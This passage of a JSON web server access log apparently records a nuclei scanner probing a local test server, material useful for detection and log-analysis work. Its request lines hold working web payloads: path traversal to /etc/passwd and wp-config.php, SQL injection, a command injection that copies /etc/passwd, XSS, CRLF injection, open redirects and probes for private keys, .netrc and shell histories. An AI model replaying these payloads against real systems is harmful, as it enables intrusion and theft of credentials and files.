HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/images/MyVue/MyVueHelp.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ksh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"json={\x22url\x22:\x22/general/../../mysql5/my.ini\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ispirit/interface/gateway.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpversion.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.netrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5m78j9kfWdXzoz6eidmkf5c4.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/search_authors HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.sh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pretty HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /time.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"username=admin&password=ixcache","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_netrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /init.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_cat/indices?v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OpenAM-11.0.0/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw/mindex.do?url=./WEB-INF/web.xml%3f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.zsh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps-admin/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /startup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////http://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all/_search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /(download)/tmp/poc.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/proxy/tcp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax/telemetry.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /old_phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deploy.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event3=352513&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers 